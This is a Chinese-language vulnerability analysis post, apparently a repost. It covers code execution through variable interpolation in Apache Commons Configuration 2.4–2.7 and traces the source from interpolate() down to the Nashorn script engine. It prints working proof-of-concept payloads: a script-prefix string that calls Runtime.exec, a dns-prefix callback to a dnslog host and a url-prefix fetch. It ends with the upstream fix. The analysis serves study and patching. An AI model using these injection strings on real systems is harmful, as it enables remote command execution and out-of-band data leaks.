前言
最近注意到了Apache Commons Configuration 在2.7版本已经不安全了,能够直接影响该组件,来分析学一下漏洞原理
漏洞分析
前置
Commons Configuration是一个java应用程序的配置管理类库。可以从properties或者xml文件中加载软件的配置信息,用来构建支撑软件运行的基础环境。在一些配置文件较多较的复杂的情况下,使用该配置工具比较可以简化配置文件的解析和管理。也提高了开发效率和软件的可维护性。
它目前支持的配置文件格式有:
Properties files
XML documents
Windows INI files
Property list files (plist)
JNDI等等
根据官方给出的漏洞通报
https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s
明白这个CVE的漏洞点是在变量插值中造成的
那么什么是变量插值呢?
在commons-configuration2来说,变量插值,就类似于引用动态变量的方式,就好比,如果我们需要获取系统中的某个环境变量,我们可以在配置文件中使用${env:envname}, 如果需要获取用户根目录,同样可以通过${sys:user.home}
我们可以跟进一下源码,看看这种写法是在哪里解析的
他主要是在org.apache.commons.configuration2.interpol.ConfigurationInterpolator#interpolate中对这种写法进行解析,赋予其对应的值
从注释中我们可以知道对于变量的插值,如果这个值他是字符串类型的,他将会检查时候包含有变量,如果有,将会替换这个变量,如果没有就按照源String返回
所以我们同样可以通过使用该方法进行变量插值的使用
package pers.test_01; import org.apache.commons.configuration2.interpol.ConfigurationInterpolator; import org.apache.commons.configuration2.interpol.InterpolatorSpecification; public class Commons_Configuration2_Test { public static void main(String[] args) { InterpolatorSpecification interpolatorSpecification = new InterpolatorSpecification.Builder() .withPrefixLookups(ConfigurationInterpolator.getDefaultPrefixLookups()) .withDefaultLookups(ConfigurationInterpolator.getDefaultPrefixLookups().values()) .create(); //创建示例 ConfigurationInterpolator configurationInterpolator = ConfigurationInterpolator.fromSpecification(interpolatorSpecification); // 解析字符串 System.out.println("${env:JAVA_HOME}->" + configurationInterpolator.interpolate("${env:JAVA_HOME}")); } }
同样可以使用这种变量插值
影响范围
2.4 ~ 2.7
漏洞
首先引入Commons-Configuration的依赖
<dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-configuration2</artifactId> <version>2.7</version> </dependency>
我们从之前的漏洞通告可以知道,由script将会导致JVM脚本执行
我们debug分析一下他的流程
System.out.println("${Script:javascript:java.lang.Runtime.getRuntime().exec(\"calc\")} ->" + configurationInterpolator.interpolate("${script:javascript:java.lang.Runtime.getRuntime().exec(\"calc\")}"));
我们在前面说的在interpolate方法中打下断点
传入了变量插值的值,首先判断他是否是String的实例,之后将会调用looksLikeSingleVariable进行判断格式是否正确
之后成功达到了resolveSingleVariable的调用
我们跟进extractVariableName方法,在该方法中,他将去掉${}等字符,取出变量值
之后调用resolve进行处理
在该方法中,他将分别取出prefix name value字段
通过调用fetchLookupForPrefix方法传入prefix,取出对应的LookUp对象
直接从prefixLookups这个Map对象属性中获取对应的StringLookupAdapter类
之后我们紧跟着调用了lookup方法
这里也可以知道对应的stringLookup为ScriptLookup类对象,跟进其lookup方法的调用
他首先会通过:将其进行分隔开来,并判断了其格式,再分别取出了engineName和script之后,将会在后面通过调用getEngineByName方法的调用传入engineName,得到了scriptEngine为NashormScriptEngine类
跟进其eval方法
带入了script和context对象继续调用eval方法
跟进evalImpl方法
到最后成功执行了我们的代码,达到了命令执行
贴一个调用栈
exec:347, Runtime (java.lang) invokeVirtual_LL_L:-1, 1750905143 (java.lang.invoke.LambdaForm$DMH) reinvoke:-1, 1241529534 (java.lang.invoke.LambdaForm$BMH) exactInvoker:-1, 1528923159 (java.lang.invoke.LambdaForm$MH) linkToCallSite:-1, 1683662486 (java.lang.invoke.LambdaForm$MH) :program:1, Script$\^eval\_ (jdk.nashorn.internal.scripts) invokeStatic_LL_L:-1, 1783593083 (java.lang.invoke.LambdaForm$DMH) invokeExact_MT:-1, 1740797075 (java.lang.invoke.LambdaForm$MH) invoke:637, ScriptFunctionData (jdk.nashorn.internal.runtime) invoke:494, ScriptFunction (jdk.nashorn.internal.runtime) apply:393, ScriptRuntime (jdk.nashorn.internal.runtime) evalImpl:449, NashornScriptEngine (jdk.nashorn.api.scripting) evalImpl:406, NashornScriptEngine (jdk.nashorn.api.scripting) evalImpl:402, NashornScriptEngine (jdk.nashorn.api.scripting) eval:155, NashornScriptEngine (jdk.nashorn.api.scripting) eval:264, AbstractScriptEngine (javax.script) lookup:86, ScriptStringLookup (org.apache.commons.text.lookup) lookup:45, StringLookupAdapter (org.apache.commons.configuration2.interpol) resolve:497, ConfigurationInterpolator (org.apache.commons.configuration2.interpol) resolveSingleVariable:529, ConfigurationInterpolator (org.apache.commons.configuration2.interpol) interpolate:362, ConfigurationInterpolator (org.apache.commons.configuration2.interpol) main:15, Commons_Configuration2_Test (pers.test_01)
根据漏洞通报中,同样还有这其他的prefix造成的影响
System.out.println(configurationInterpolator.interpolate("${dns:" + "test." + "uqp639.dnslog.cn}"));
同样可以实现dns解析
同样还可以访问远程url
System.out.println(configurationInterpolator.interpolate("${url:http:http://127.0.0.1:8000/}"));
修复
再查看diff之后
https://github.com/apache/commons-configuration/commit/f025bc399e8125ffc7701ac74f09b833c5b5e152#diff-ae29e7f41cf746bc365d2cd17ca0cf535757498625a7203db240113021082f3f
根据官方的更新描述
默认将script url dns等prefix给去除了
Reference
https://github.com/apache/commons-configuration
https://www.anquanke.com/post/id/276734
如有侵权请联系:admin#unsafe.sh